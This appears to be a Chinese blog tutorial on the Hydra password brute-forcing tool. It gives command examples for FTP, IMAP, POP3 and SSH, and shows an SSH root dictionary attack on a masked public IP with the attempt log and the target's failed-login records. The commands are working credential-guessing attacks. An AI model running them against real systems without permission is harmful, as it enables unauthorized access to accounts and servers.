暴力破解工具Hydra 使用
谭池暝
kali 自带的hydra 工具,直接使用即可,不再赘述安装过程
常用命令如下
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh其中参数说明
| -l | 指定要爆破的用户名【常用】 |
| -L | 如果用户名很多放在文件中,可以只用这个参数 |
| -p | 指定要使用的密码【常用】 |
| -P | 指定要使用的密码文件 |
| ftp:// | 指定要爆破的协议,这里使用ftp 协议,其它常用的还有ssh,rdp,mysql、redis等 |
| 192.168.0.1 | 指定要爆破的目标机器ip 地址 |
hydra 支持爆破的协议如下
adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
实战测试
目标机器:139.x.x.x
目标服务:ssh
密码字典:top100.txt 【字典下载地址:https://download.csdn.net/download/helloexp/20107342】
hydra -l root -P top100.txt ssh://139.x.x.x -t 4 -V -I
运行过程如下
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-09 16:02:14
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 100 login tries (l:1/p:100), ~25 tries per task
[DATA] attacking ssh://139.x.x.x:22
[ATTEMPT] target 139.x.x.x - login "root" - pass "123456789" - 1 of 100 [child 0] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "a123456" - 2 of 100 [child 1] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "123456" - 3 of 100 [child 2] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "a123456789" - 4 of 100 [child 3] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "1234567890" - 5 of 100 [child 0] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "woaini1314" - 6 of 100 [child 1] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "qq123456" - 7 of 100 [child 2] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "abc123456" - 8 of 100 [child 3] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "123456a" - 9 of 100 [child 0] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "123456789a" - 10 of 100 [child 2] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "147258369" - 11 of 100 [child 1] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "zxcvbnm" - 12 of 100 [child 3] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "987654321" - 13 of 100 [child 0] (0/0)
[ATTEMPT] target 139.x.x.x - login "root" - pass "12345678910" - 14 of 100 [child 2] (0/0)
目标服务器上观察下暴力破解的痕迹
[root@hack139 log]# lastb
root ssh:notty 180.x.x.x Fri Jul 9 16:03 - 16:03 (00:00)
root ssh:notty 180.x.x.x Fri Jul 9 16:03 - 16:03 (00:00)
root ssh:notty 180.x.x.x Fri Jul 9 16:03 - 16:03 (00:00)
root ssh:notty 180.x.x.x Fri Jul 9 16:03 - 16:03 (00:00)
root ssh:notty 180.x.x.x Fri Jul 9 16:03 - 16:03 (00:00)
root ssh:notty 180.x.x.x Fri Jul 9 16:03 - 16:03 (00:00)
root ssh:notty 180.x.x.x Fri Jul 9 16:03 - 16:03 (00:00)
root ssh:notty 180.x.x.x Fri Jul 9 16:03 - 16:03 (00:00)
root ssh:notty 180.x.x.x Fri Jul 9 16:03 - 16:03 (00:00)
root ssh:notty 180.x.x.x Fri Jul 9 16:03 - 16:03 (00:00)
root ssh:notty 180.x.x.x Fri Jul 9 16:03 - 16:03 (00:00)
root ssh:notty 180.x.x.x Fri Jul 9 16:03 - 16:03 (00:00)
root ssh:notty 180.x.x.x Fri Jul 9 16:03 - 16:03 (00:00)
root ssh:notty 180.x.x.x Fri Jul 9 16:03 - 16:03 (00:00)可以看到hydra 正在一个个尝试字典中的密码
类似资料: